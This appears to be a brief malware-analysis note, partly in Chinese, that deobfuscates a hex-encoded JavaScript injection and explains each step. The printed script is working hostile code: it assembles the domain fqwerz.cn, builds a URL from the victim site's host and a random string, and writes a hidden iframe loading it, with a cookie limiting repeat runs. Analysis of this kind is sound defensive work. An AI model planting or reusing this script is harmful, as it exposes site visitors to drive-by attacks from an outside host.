eval('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x61\x33\x70\x7a\x62\x74\x28\x6a\x43\x57\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x69\x4a\x28\x6d\x6c\x77\x78\x47\x29\x7b\x76\x61\x72\x20\x67\x67\x42\x66\x3d\x30\x3b\x76\x61\x72\x20\x78\x76\x52\x68\x3d\x6d\x6c\x77\x78\x47\x2e\x6c\x65\……);
==> (arguments.callee的, malzilla执行)
function ZPQMhxbA(){};ZPQMhxbA.prototype = {path:"f"+String.fromCharCode(113)+new String("w")+String.fromCharCode(101)+new String("r")+String.fromCharCode(122)+new String(".")+String.fromCharCode(99)+"n",cookieValue:1,alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},cookieName:'fcdhaebg',setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },host:'/q.cn/',getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.path + this.host;},getRandString : function(){var l=16,c='0t1>2>3r4j5R6j7>8R9>arbtcrdjejf>'.replace(/[tjrR\>]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},install : function(){if(!this.alreadyInstalled()){var s="<XdXiLv% %sXt%y]l]eL={\'Xd]i{s]p%l]a{y]:]n%o{nLeX\'L>%<Li%fXr{a{mXeL {sLr%c]=%\'%".replace(/[L\]X%\{]/g, '')+this.getFrameURL()+"\'+>1<[/1i[f[r+a1m.e+>+<+/[d+i^v.>^".replace(/[\.\+\[\^1]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ChGt4mulC>u<4bCoJdJyC>4'.replace(/[uGJC4]/g, '')+s+'<8/Mb8ozd8yM>c<c/ch.tcmzl8>.'.replace(/[zc8\.M]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}}};var ocho=new ZPQMhxbA();ocho.install();
===》
ZPQMhxbA.prototype = {path:"f"+String.fromCharCode(113)+new String("w")+String.fromCharCode(101)+new String("r")+String.fromCharCode(122)+new String(".")+String.fromCharCode(99)+"n"
(fqwerz.cn)
dlh=document.location.host;
(dlh=mebel.by.ru)
host:'/q.cn/',getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.path + this.host;
(return: http://mebel.by.ru.abcdefg(随机字符).fqwerz.cn/q.cn/)
var s="<XdXiLv% %sXt%y]l]eL={\'Xd]i{s]p%l]a{y]:]n%o{nLeX\'L>%<Li%fXr{a{mXeL {sLr%c]=%\'%".replace(/[L\]X%\{]/g, '')+this.getFrameURL()+"\'+>1<[/1i[f[r+a1m.e+>+<+/[d+i^v.>^".replace(/[\.\+\[\^1]/g, '');
此处iframe写入以上网址,代码执行。 |